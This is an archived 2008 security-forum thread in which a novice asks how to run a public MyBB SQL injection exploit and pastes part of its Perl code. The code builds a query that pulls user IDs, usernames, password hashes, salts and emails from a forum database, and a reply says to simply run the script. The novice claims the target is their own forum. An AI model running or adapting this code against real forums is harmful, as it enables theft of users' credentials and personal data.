Waraxe IT Security Portal
Login or Register
November 15, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 82
Members: 0
Total: 82
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> I need english version for this exploit ?
Post new topicReply to topic View previous topic :: View next topic
I need english version for this exploit ?
PostPosted: Wed May 14, 2008 12:14 pm Reply with quote
France
Regular user
Regular user
Joined: May 14, 2008
Posts: 10




Like i said i looking for english translate for this mybb exploit or if you can make copy of good exploit.pl that u can use it.
Code:

http://www.milw0rm.com/exploits/3719


Thank you !
View user's profile Send private message
PostPosted: Wed May 14, 2008 1:20 pm Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




The script itself is in english, but the comments are not. Just run the script and im sure you'll understand it.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Wed May 14, 2008 2:07 pm Reply with quote
France
Regular user
Regular user
Joined: May 14, 2008
Posts: 10




I saw now when i made exploit.pl but still i dont know howt to set.When i run explit i don't get errors,but i don't get info from victime web site ?

Can you say me how to set this exploit .I can't give my settings because i try to hack my own forum Smile

Is this part off code that i need to edit ?

I'm new here and i want to test security of my website.Thank you for your time and help too.
Code:

if (@ARGV < 2) {&info(); exit();}

$host = $ARGV[0]; # ??????
$dir = $ARGV[1]; # ???? ? ???????
$uid = 2; # ??? ?????? ?? ????????
$uid = $ARGV[2] if $ARGV[2];

$debug = 0; # ????? ???????
$space = "char(58)"; # ??????????? ????????
#$search = "password"; # ??? ??????, ??????????...
#$search = "concat(uid,$space,password,$space,salt)"; # uid:password:salt
$search = "concat(uid,$space,username,$space,password,$space,salt,$space,email)"; # uid:username:password:salt:email
$search = $ARGV[3] if $ARGV[3];

# $presetascii - ???????? ascii-????? ??? ????? ????????? ??????
# $presetascii = "0123456789abcdef";
# $presetascii = "0123456789"
# $presetascii = "abcdefghijklmnopqrstuvwxyz"
# $presetascii = "0123456789abcdefghijklmnopqrstuvwxyz"
# $presetascii = "?????????????????????????????????");
# ????, ??? ???????? ?????? ??? ??????? ??? ????????
$i=0;
while($i<=255){
$presetascii.=chr($i);$i++;
}

###########################################################
######################### go! ###########################
###########################################################


$time=localtime;
&log ("[i] Start time $time\n");
&log ("[+] HOST \"$host\"\n");
&log ("[+] DIR \"$dir\"\n");
&log ("[+] UID \"$uid\"\n");
&log ("[+] Search \"$search\"\n");

###########################################################
###### detecting vulnerability and searching prefix #######
###########################################################

# detecting vulnerability and searching prefix
&log ("[~] Testing forum vulnerabile... ");
$q = "";
$prefix=query($q,$host,$dir);
if($prefix ne "not_find"){&log ("Yes! Forum vulnerable!\n");sleep(1);&log ("[~] Searching prefix...");sleep(1);&log (" prefix find - \"$prefix\"\n"); }
else
{
&log ("Sorry. Forum unvulnerable\n");
&footer();
exit();
}
View user's profile Send private message
PostPosted: Thu May 15, 2008 10:24 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




Don't edit the code.
Run the script from a command line such as: "perl script.pl"
It will then prompt you with the required input.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
I need english version for this exploit ?
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds